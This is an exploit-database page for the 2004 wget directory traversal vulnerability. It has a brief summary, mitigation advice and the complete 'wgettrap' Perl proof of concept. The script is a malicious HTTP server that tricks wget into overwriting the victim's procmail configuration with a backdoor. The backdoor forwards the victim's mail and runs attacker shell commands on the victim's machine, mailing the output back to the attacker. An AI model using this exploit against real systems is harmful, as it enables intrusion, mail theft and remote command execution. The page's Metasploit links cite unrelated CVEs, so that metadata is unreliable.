header-logo
Suggest Exploit
vendor:
wget
by:
Jan Min????
5.5
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: wget
Affected Version From: wget 1.9
Affected Version To: wget 1.9.1
Patch Exists: YES
Related CWE: CVE-2004-0452
CPE: a:gnu:wget:1.9
Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-perl-cve-2008-5303/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0013-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-5303/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0013-cve-2008-5303/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/apple-osx-perl-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-5303/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-700-1/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-2827/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-13b0c8c8-bee0-11dd-a708-001fc66e7203/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2005-0448/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-4a99d61c-f23a-11dd-9f55-0030843d3802/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2005-0448/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2005-0448/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2004-0452/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-c418d472-6bd1-11d9-93ca-000a95bc6fae/https://www.rapid7.com/db/vulnerabilities/suse-cve-2004-0452/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2004-0452/
Other Scripts:
Platforms Tested:
2004

wget directory traversal vulnerability

This is a proof of concept (POC) for the wget(1) directory traversal vulnerability. It demonstrates how an attacker can exploit the vulnerability to override a file on the target system. The POC uses a simple directory traversal technique to construct a malicious redirect that tricks wget into attempting to overwrite the specified file. The payload in the POC includes a shell command that is executed on the target system when wget connects for the second time. The POC also demonstrates how the attacker can send shell output via email.

Mitigation:

The vulnerability was patched in wget version 1.9.1. Users should update to the latest version of wget to mitigate the risk. Additionally, it is recommended to verify the integrity of downloaded files and avoid using wget with untrusted sources.
Source

Exploit-DB raw data:

#!/usr/bin/perl -W
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability
#
# Copyright 2004 Jan Min???? (jjminar fastmail fm)
# License: Public Domain
#
# When wget connects to us, we send it a HTTP redirect constructed so that wget
# wget will connect the second time, it will be attempting to override
# ~/.procm4ilrc (well, provided that the user running wget has username 'jan'
# 8-)).

use POSIX qw(strftime);

# This is our scheme/host/port
$server = "http://localhost:31340";
# Use this + DNS poisoning with wget 1.9 & CVS
#$server = "http://..";

# Wanna know who got infected?
#$log = "/dev/pts/1";

# The filename we will try to overwrite on the target system
$filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";

############### Payload #########################################
$email = 'your@mailbox';
$password = 'Pmrpuf ner cevzvgvirf';
$payload = <<EOP;
:0c
| mail -s 'Wgettrap mail copy' $email
:0
* ^X-Wgettrap-Command: shell
* ^X-Wgettrap-Password: $password
| /bin/sh -c '/bin/sh | mail -s "Wgettrap shell output" $email'
EOP
chomp $payload;
############### Payload #########################################

# A simple directory traversal, for greater effect
$trick = "/.." . "%2f.." x 40;

open LOG, ">$log" if $log;

while(<STDIN>){
        print LOG $_ if $log;
        if (/\Q$trick$filename\E/) {
        #if (/%2f/) {
                # We see the filename, so this is the second time
                # they're here.  Time to feed the sploit.
                $second++;
        } elsif (/^Range: bytes=\(33\)-/) {
                # Appending goes like this:
                # (1) Tell'em what you're gonna tell'em
                # (2) Then tell'em just a half
                # (3) Close it
                # (4) Wait
                # (5) They're comin' back, with wget -c
                # (6) Tell'em the sploit
                # (7) Close again
                # (8) Wtf? They're comin' back with wget -c again
                # (9) Tell'em the rest...
                # (10) ... enjoying the backdoor at the same time
                print LOG "File if $1 bytes long\n" if $log;
        } elsif (/^\r?$/) {
                # The HTTP headers are over.  Let's do it!
                $date = strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
                if (!$second) {
                        # Print the payload
                        print <<EOT;
HTTP/1.1 301 Moved Permanently\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Location: $server$trick$filename\r
Content-Length: 43\r
Connection: close\r
Content-Type: text/html\r
\r
<html><head><title></title></head></html>\r
EOT
                } else {
                        # Print the redirection
                        print <<EOT;
HTTP/1.1 200 OK\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Content-Length: 25\r
Connection: close\r
Content-Type: text/plain\r
\r
$payload
EOT
                }
                exit 0;
        }
}

Navigation

Suggest Exploit

Services By CQR